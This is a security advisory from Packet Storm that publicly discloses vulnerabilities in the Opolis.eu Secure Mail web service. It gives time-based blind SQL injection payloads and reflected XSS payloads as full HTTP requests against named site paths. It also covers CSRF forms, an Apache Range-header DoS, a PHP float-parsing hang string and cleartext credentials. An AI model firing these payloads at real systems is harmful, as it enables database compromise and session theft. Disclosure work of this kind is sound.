Lucene search

K
packetstormJuan Carlos GarciaPACKETSTORM:123527
HistoryOct 07, 2013 - 12:00 a.m.

Opolis.eu Secure Mail Blind SQL Injection / XSS / CSRF / DoS

2013-10-0700:00:00
Juan Carlos Garcia
packetstormsecurity.com
992

0.963 High

EPSS

Percentile

99.6%

`=========================================================================================================================================================================  
OPOLIS.EU SECURE MAIL Blind SQLInjection / Cross site scripting / CSRF / Apacche httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/User credentials are sent in clear text  
==========================================================================================================================================================================  
  
TIME-LINE VULNERABILITY  
  
Multiples Advisories   
  
Opolis Secure IT-Services GmbH  
  
Address:Romberggasse 3  
1230 Vienna  
Austria  
E-Mail Contact: [email protected]<[email protected]>  
  
BUT   
  
Not Response  
  
THEN  
  
Full Disclosure  
  
  
I. VULNERABILITY  
-------------------------  
#Title: OPOLIS.EU SECURE MAIL BLIND SQLInjection / Cross site scripting /Cross Site Request Forgery/ Apache httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/ Credentials are sent in clear text  
  
#Vendor:http://www.opolis.eu/  
  
#Author:Juan Carlos García (@secnight)  
  
#Follow me   
Twitter:@secnight  
  
II. DESCRIPTION  
-------------------------  
Opolis Secure Mail is dedicated to provide the most user-friendly high-security E-Mail and document messaging service.  
Opolis re-defines E-Mail with its “Power to the Sender” philosophy: The sender decides if or how E-Mails may be further   
processed and the sender monitors the processing and forwarding flow of messages. Opolis also offers co-branded solutions  
for internet and E-Mail communication as well as document messaging. Opolis Secure Mail is owned by privately-held PI Technology Co WLL.  
  
III. PROOF OF CONCEPT  
-------------------------  
  
Blind SQL Injection  
********************  
  
Vulnerability description  
-------------------------  
  
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and   
  
doesn't properly filter out dangerous characters.   
  
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.  
  
Affected items  
----------------  
  
/createOpolisWorkGroup/createOpolisWorkGroupStep5.php   
  
  
URL encoded POST input checkedemail was set to 1';select pg_sleep(2); --   
  
POST /createOpolisWorkGroup/createOpolisWorkGroupStep5.php   
  
aiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=NIL&aifirstname=myufyvmc&ailanguage=English&ailastname=myufyvmc&aititle=Mr.&aizip=94102&checkedemail=1%27%3bselect  
  
%20pg_sleep%282%29%3b%20--%20&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=myufyvmc  
  
  
  
/slimstat/stats_js.php   
  
"ttl"  
  
URL encoded GET input "ttl" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK  
  
(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR"*/  
  
  
  
GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version  
  
%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%  
  
GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version  
  
%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%  
  
  
"url"  
  
URL encoded GET input "url" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK  
  
(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR"*/  
  
  
  
GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR  
  
%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f   
  
  
GET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR  
  
%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f  
  
  
Cross site scripting ( 67 )  
*********************  
  
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious  
code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be  
trusted or not, it will execute the script in the user context allowing the attacker to access any cookies  
or session tokens retained by the browser.   
  
Affected items  
----------------  
  
/createOpolisWorkGroup/createOpolisWorkGroupStep1.php (2)  
  
URL encoded POST input OSMLogInNam was set to hkmohkhr_974672"():;934304  
  
  
POST /createOpolisWorkGroup/createOpolisWorkGroupStep1.php  
  
checkloginname=&OSMLogInNam=hkmohkhr_974672%22%28%29%3a%3b934304  
  
  
  
/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (2)  
  
URL encoded POST input currentEmail was set to sample%40email.tst_940309"():;974560  
  
  
POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php   
  
currentEmail=sample%2540email.tst_940309%22%28%29%3a%3b974560&showcheckedloginname=rgrdtkbl  
  
  
  
/OpolisSignUp/OpolisSignUpStep1a.php (2)  
  
URL encoded POST input OSMLogInNam was set to etomstqd_911786"():;974637  
  
POST /OpolisSignUp/OpolisSignUpStep1a.php   
  
checkloginname=&OSMLogInNam=etomstqd_911786%22%28%29%3a%3b974637  
  
  
  
  
/OpolisSignUp/OpolisSignUpStep2a.php   
  
URL encoded POST input currentEmail was set to sample%40email.tst_928249"():;986211  
  
The input is reflected inside <script> tag between double quotes.  
  
  
  
POST /OpolisSignUp/OpolisSignUpStep2a.php   
  
  
currentEmail=sample%2540email.tst_928249%22%28%29%3a%3b986211&showcheckedloginname=vethpimh  
  
  
/createOpolisWorkGroup/createOpolisWorkGroupStep2.php. (3)  
  
URL encoded POST input checkedloginname was set to 1" onmouseover=prompt(939864) bad="  
  
  
POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php  
  
checkedloginname=1%22%20onmouseover%3dprompt%28939864%29%20bad%3d%22&showEmailfield=  
  
  
  
/createOpolisWorkGroup/createOpolisWorkGroupStep3.php. (5)  
  
  
URL encoded POST input checkedemail was set to 1" onmouseover=prompt(911118) bad="  
  
POST /createOpolisWorkGroup/createOpolisWorkGroupStep3.php   
  
checkedemail=1%22%20onmouseover%3dprompt%28911118%29%20bad%3d%22&checkedloginname=&showverifyEmailfield  
  
  
  
POST /createOpolisWorkGroup/createOpolisWorkGroupStep4.php. (5)  
  
URL encoded POST input checkedemail was set to 1" onmouseover=prompt(967963) bad="  
  
checkedemail=1%22%20onmouseover%3dprompt%28967963%29%20bad%3d%22&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=juvgwacr&verifycurrentEmail=sample%40email.tst  
  
  
  
/createOpolisWorkGroup/createOpolisWorkGroupStep5.php. (52)  
  
URL encoded POST input aicountry was set to Antarctica'"()&%<ScRiPt >prompt(973546)</ScRiPt>  
  
aiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=Antarctica%27%22%28%29%26%25%3cScRiPt%20%3eprompt%28973546%29%3c%2fScRiPt  
  
%3e&aifirstname=kmaqpmwp&ailanguage=English&ailastname=kmaqpmwp&aititle=Mr.&aizip=94102&checkedemail=&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=kmaqpmwp  
  
  
  
  
/OpolisSignUp/OpolisSignUpStep2a.php. (3)  
  
URL encoded POST input checkedloginname was set to 1" onmouseover=prompt(994853) bad="  
  
checkedloginname=1%22%20onmouseover%3dprompt%28994853%29%20bad%3d%22&showEmailfield=  
  
  
/OpolisSignUp/OpolisSignUpStep3a.php. (5)  
  
URL encoded POST input checkedemail was set to 1" onmouseover=prompt(935016) bad="  
  
checkedemail=1%22%20onmouseover%3dprompt%28935016%29%20bad%3d%22&checkedloginname=&showverifyEmailfield=  
  
  
Cross Site Request Forgery CSRF (12)  
*******************************  
  
Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF,  
is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.  
  
  
Affected items  
---------------  
/createOpolisWorkGroup/createOpolisWorkGroupStep1.php   
/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0)   
/createOpolisWorkGroup/createOpolisWorkGroupStep3.php   
/createOpolisWorkGroup/createOpolisWorkGroupStep4.php (32e4ce87958c47459e9174f94651b76d)   
/OpolisSignUp/OpolisSignUpStep1a.php   
/OpolisSignUp/OpolisSignUpStep2a.php (f3d86faf83a15fd403feae569c201ee0)   
/OpolisSignUp/OpolisSignUpStep3a.php   
/slimstat (9200b13decfada22b75676834e865e65)   
  
The impact of this vulnerability  
---------------------------------  
  
An attacker may force the users of a web application to execute actions of the attacker's choosing.   
A successful CSRF exploit can compromise end user data and operation in case of normal user.   
If the targeted end user is the administrator account, this can compromise the entire web application.  
  
  
Two examples ( too much security flaws .. )  
  
/createOpolisWorkGroup/createOpolisWorkGroupStep1.php. (2)  
  
Attack details  
----------------  
Form name: OSMSignUp  
Form action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep1.php  
Form method: POST  
  
Form inputs:  
  
checkloginname [Hidden]  
OSMLogInNam [Text]  
  
  
/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0).   
  
Attack details  
-----------------  
Form name: OSMSignUp  
Form action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep2.php  
Form method: POST  
  
Form inputs:  
  
showcheckedloginname [Text]  
currentEmail [Text]  
  
POST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php  
  
checkedloginname=&showEmailfield=  
  
  
  
Apache httpd Remote D.O.S (2)  
**************************  
  
Vulnerability description  
-------------------------------  
A denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server:   
  
http://seclists.org/fulldisclosure/2011/Aug/175   
  
An attack tool is circulating in the wild. Active use of this tools has been observed.   
  
The attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server.   
  
  
Affected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19).  
  
  
How to fix this vulnerability  
----------------------------  
Upgrade to the latest version of Apache HTTP Server (2.2.20 or later), available from the Apache HTTP Server Project Web site.   
  
Web references  
--------------  
CVE-2011-3192   
Apache HTTPD Security ADVISORY   
Apache HTTP Server 2.2.20 Released   
Apache httpd Remote Denial of Service (memory exhaustion)   
  
  
Apache httpOnly cookie disclosure  
**********************************  
  
Vulnerability description  
----------------------------  
Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors   
  
involving a (1) long or (2) malformed header in conjunction with crafted web script.  
  
Affected Apache versions (up to 2.0.21).  
  
The impact of this vulnerability  
-------------------------------  
Information disclosure.  
  
How to fix this vulnerability  
------------------------------  
Upgrade Apache 2.x to the latest version. Apache 2.2.22 is the first version that fixed this issue.  
  
Web references  
---------------  
Fixed in Apache httpd 2.2.22   
Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability   
  
  
  
PHP hangs on parsing particular strings as floating point number (2)  
*****************************************************************  
  
PHP hangs when parsing '2.2250738585072011e-308' string as a floating point number.  
  
Current version is : PHP/5.3.1  
  
Affected PHP versions: 5.3 up to version 5.3.5 and 5.2 up to version 5.2.17  
  
Affected items  
---------------  
Web Server   
  
The impact of this vulnerability  
----------------------------------  
Denial of service attack  
  
How to fix this vulnerability  
-------------------------------  
Upgrade PHP to the latest version.  
  
Web references  
-----------------  
PHP Hangs On Numeric Value 2.2250738585072011e-308   
PHP Homepage   
  
  
User credentials are sent in clear text  
*****************************************  
  
Vulnerability description  
---------------------------  
User credentials are transmitted over an unencrypted channel.   
This information should always be transferred via an encrypted channel (HTTPS) to avoid being intercepted by malicious users.  
  
Affected items  
--------------  
/slimstat (9200b13decfada22b75676834e865e65)   
  
The impact of this vulnerability  
----------------------------------  
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.  
  
How to fix this vulnerability  
-------------------------------  
Because user credentials are considered sensitive information, should always be transferred to the server over an encrypted connection (HTTPS).  
  
  
IV. BUSINESS IMPACT  
-------------------------  
  
( No Comments... )  
  
V SOLUTION  
------------------------  
  
Very easy and I don´t understand... WRITE SECURE CODE P L E A S E !!  
  
  
VI. CREDITS  
-------------------------  
  
This vulnerability has been discovered  
by Juan Carlos García(@secnight)  
  
  
VII. LEGAL NOTICES  
-------------------------  
  
The Author accepts no responsibility for any damage  
caused by the use or misuse of this information.  
  
  
`